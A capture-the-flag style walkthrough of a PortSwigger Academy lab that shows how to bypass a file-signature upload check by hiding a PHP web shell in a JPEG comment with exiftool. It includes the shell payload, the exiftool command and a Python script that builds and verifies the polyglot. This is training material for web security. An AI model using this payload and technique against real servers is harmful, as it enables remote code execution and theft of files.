Remote code execution via polyglot web shell upload

Explaining remote code execution via polyglot web shell upload in PortSwigger Academy

In this post I will show how to bypass a server-side file-type check by embedding a PHP script in an image's metadata, so that the file both passes as an image and executes as PHP, using the PortSwigger Academy lab linked below.

Problem

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener - peter

Solution

First access the lab from the given link

https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload

Then login with the credentials provided in the problem statement

wiener - peter

Before you begin, configure Burp Suite as your browser's proxy and leave it capturing traffic in the background so you can review the requests later.

Next, download a sample image from the internet (bird.jpg is used below) and upload it as your avatar to see what a normal upload looks like. Then create the PHP script that reads carlos's secret:

<?php echo file_get_contents('/home/carlos/secret'); ?>

Now upload the PHP script as your avatar.

The upload is rejected. Changing or obfuscating the extension does not help either, because the back end inspects the file's contents rather than just its name: it only accepts the upload if the leading bytes match a known image signature (a JPEG starts with FF D8 FF, for example). A file that begins with PHP tags fails that check whatever it is called.

To get past this check we use exiftool, a tool for reading and writing image metadata. It can write a comment field into an existing image, which lets us embed the PHP code in the metadata while keeping the image's genuine header intact.

Use the command below to embed the PHP code in the image we downloaded earlier; the result is written to a new file, polyglot.php:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" bird.jpg -o polyglot.php

Because the PHP code lives in the image's comment field, the file still starts with a genuine JPEG header and passes the signature check, yet it also contains the PHP tags. The code prints the secret between the words START and END so it is easy to pick out of the binary image data that surrounds it.

Upload polyglot.php. It is accepted because its leading bytes are those of a JPEG, but it keeps the .php extension, so the server executes it when the file is fetched. In Burp's HTTP history, find the GET request that loads the uploaded avatar and look at the response body.
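To make the mechanism concrete, here is an added Python example (my own code, not part of the original post or of the PortSwigger lab) that builds the same kind of JPEG/PHP polyglot that exiftool produces, runs it through a magic-number check of the kind the lab's back end appears to perform (the exact server-side check is an assumption), walks the JPEG segments to confirm the PHP landed in the comment field, and pulls the secret out of a constructed response body like the one you see in the GET response. The minimal JFIF header bytes and the sample response are constructed for the example.

```python
import re
import struct
from typing import Optional

# JPEG marker bytes (from the JPEG/JFIF specification).
SOI = b"\xff\xd8"   # Start Of Image: the signature every image-magic check looks for
EOI = b"\xff\xd9"   # End Of Image
COM = b"\xff\xfe"   # Comment segment: where exiftool's -Comment tag is stored

# Constructed minimal JFIF APP0 segment (16 bytes including its length field).
# It carries no pixel data, which is enough for a header check but not a viewer.
APP0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"

# The same payload the post embeds with exiftool.
PHP_PAYLOAD = b"<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>"


def build_polyglot(payload: bytes) -> bytes:
    """Return bytes that are both a well-formed JPEG and a PHP script.

    The payload goes into a COM segment: marker 0xFFFE, then a 2-byte
    big-endian length that counts itself plus the comment body. Because
    PHP emits everything outside <?php ... ?> verbatim and only executes
    what is inside the tags, the surrounding binary does not stop execution.
    """
    if len(payload) + 2 > 0xFFFF:
        raise ValueError("a JPEG comment segment holds at most 65533 bytes")
    com_segment = COM + struct.pack(">H", len(payload) + 2) + payload
    return SOI + APP0 + com_segment + EOI


def looks_like_image(data: bytes) -> bool:
    """Magic-number check modelled on the lab's back end (assumed: the exact
    server-side check is not published). It never looks at the file name,
    which is why renaming the script does not help but a JPEG header does."""
    signatures = (
        SOI + b"\xff",            # JPEG: FF D8 FF
        b"\x89PNG\r\n\x1a\n",     # PNG
        b"GIF87a", b"GIF89a",     # GIF
    )
    return any(data.startswith(sig) for sig in signatures)


def jpeg_comment(data: bytes) -> Optional[bytes]:
    """Walk the marker segments and return the first COM body, or None.
    Use it on exiftool's output too, to confirm the payload landed in
    metadata rather than corrupting the header."""
    if not data.startswith(SOI):
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None                      # lost sync: not at a marker
        marker = data[pos + 1]
        if marker == 0xD9:                   # EOI reached without a COM
            return None
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        body = data[pos + 4:pos + 2 + length]
        if marker == 0xFE:
            return body
        pos += 2 + length
    return None


def extract_secret(response_body: bytes) -> Optional[str]:
    """Pull the value the shell printed between START and END out of the
    response. PHP echoes the JPEG header bytes too, so search the raw
    bytes rather than decoding the whole body as text."""
    match = re.search(rb"START (\S+) END", response_body)
    return match.group(1).decode() if match else None


# Constructed stand-in for the GET response: the bytes PHP emits outside the
# tags, with the echo output where the <?php ... ?> block used to be.
SAMPLE_RESPONSE = (
    SOI + APP0 + COM + struct.pack(">H", len(PHP_PAYLOAD) + 2)
    + b"START example-secret-from-lab END" + EOI
)

if __name__ == "__main__":
    poly = build_polyglot(PHP_PAYLOAD)
    print("plain .php passes image check:", looks_like_image(PHP_PAYLOAD))  # False
    print("polyglot passes image check:  ", looks_like_image(poly))         # True
    print("payload sits in COM segment:  ", jpeg_comment(poly) == PHP_PAYLOAD)
    print("secret from response:         ", extract_secret(SAMPLE_RESPONSE))
```

Running it shows the plain script failing the signature check while the polyglot passes, and jpeg_comment confirms the PHP is sitting in the comment segment exactly where exiftool's -Comment option puts it. To verify the file exiftool produced the same way, read polyglot.php as bytes and pass it to jpeg_comment.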

In the response body, between the binary image data, the secret appears between the START and END markers:

jaD2BmMDFqYVYc5p3UdkneVjvPGhxtnZ

Submit the secret using the button in the lab banner.

Lab Solved 😎
